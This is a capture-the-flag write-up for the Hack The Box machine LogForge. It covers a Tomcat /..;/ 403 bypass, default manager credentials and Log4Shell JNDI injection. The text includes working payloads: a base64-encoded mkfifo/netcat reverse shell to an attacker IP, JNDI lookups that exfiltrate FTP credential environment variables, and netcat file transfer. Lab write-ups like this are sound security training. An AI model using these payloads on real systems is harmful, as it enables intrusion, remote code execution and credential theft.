HTB Logforge (Medium) - Writeup
Difficulty: Medium
Discovered a Tomcat server with a /manager panel, accessed via a 403 bypass using a path traversal trick.
Identified and exploited Log4Shell by injecting a JNDI payload in a logged parameter, leading to RCE.
Gained a reverse shell using a serialized CommonsCollections gadget via JNDI Exploit Kit.
Escalated to root by exfiltrating environment variables through Log4j to retrieve FTP credentials, then SSH’ed in with a leaked private key.
Nmap
The nmap scan revealed two open and two filtered ports:
Port 80 - Website
The website consists solely of a static image, with no interactive or visible functionality.
Running Feroxbuster revealed the /admin directory, which returns a 403 Forbidden error.
It also revealed that the website is running tomcat because of directories like /manager.
We can check the headers with curl:
curl -I http://10.10.11.138/
It returns with Java cookie which indicates that backend is written in Java.
Tomcat is also written in Java meaning it’s another hint.
We can re-run feroxbuster with additional extensions and different list:
feroxbuster --url http://10.10.11.138/ -x js,jsp,java,xml -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
It found index.jsp but nothing more of interest.
403 bypass trick
If we go to /manager we get 403 access denied.
There is a report written by Orange Tsai that is a must read if you didn’t do it already:
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
I’ll paste the part about tomcat here:
It bypasses Tomcat’s path parsing and normalization logic.
We can now access:
http://<ip>/x/..;/manager
Luckily for us default credentials worked
- tomcat:tomcat
Log4Shell - exploitation
Given the name of the box there might be a log4shell vulnerability.
There is an application /UHC{BadWayToBlockTomcat}
We can click on expire and catch a request with burpsuite:
There is only one parameter called “idle”, we can try basic log4shell payload to test if that’s a case here.
For it to work we must put a paylod in the field that will be logged by log4j java library.
idle=${jndi:ldap://10.10.14.5/x}
And start tcpdump to listen for pings:
It works, now we want to get shell access.
I had many problems with getting this shell.
First I tried to run python server and marshalsec-jar ldap server but it couldn’t redirect to my python server.
Then I tried creating .ser paylod with ysoserial and running JNDI EXPLOIT KIT but it didin’t work either.
Finally the thing that worked was creating a payload directly in JNDI EXPLOIT KIT.
In order to exploit this we need JNDI EXPLOIT KIT:
git clone https://github.com/pimps/JNDI-Exploit-Kit.git
mvn clean package -DskipTests
cd target
Then run it:
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar
Now run a special query to create a payload and run it:
${jndi:ldap://10.10.14.5:1389/serial/CommonsCollections5/exec_unix/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pICAyPiYxfG5jIDEwLjEwLjE0LjUgIDkwMDUgPi90bXAvZg==}
It failed with most of the payloads but the one we used and succeed was:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9005 >/tmp/f
In final payload we had to base64 encode it:
It then gets to our server:
And finally gives us a shell access:
Priv Esc
First we can retrieve a flag:
There is a file ftpServer-1.0-SNAPSHOT-all.jar we can move it with netcat:
Attacker:
nc -nvlp 80 > ftpServer-1.0-SNAPSHOT-all.jar
Target:
nc -w 3 10.10.14.5 80 < ftpServer-1.0-SNAPSHOT-all.jar
To reverse engineer java files we can use jd-gui:
After looking through code we found credentials as two environment variables being set:
In the username parameter it uses log4j library:
It means that we can connect to ftp and in the username parameter put JNDI payload like we did in the website to get a shell access.
For it to work we need to start jdni exploit kit server as before.
Then log into ftp on the target machine twice and use following payloads:
${jndi:ldap://10.10.14.5:1389/${env:ftp_user}}
${jndi:ldap://10.10.14.5:1389/${env:ftp_password}}
Then the second payload:
Now we can look what came to our server:
It has successfully exfiltrated credentials:
- ippsec:log4j_env_leakage
With credentials we can log into ftp on the target:
Ftp runs as root and we’re in root directory.
Easiest way to obtain shell access as root is to exfiltrate his ssh key.
Now we have to copy it to kali:
There is also a flag there:
Thank you for reading!!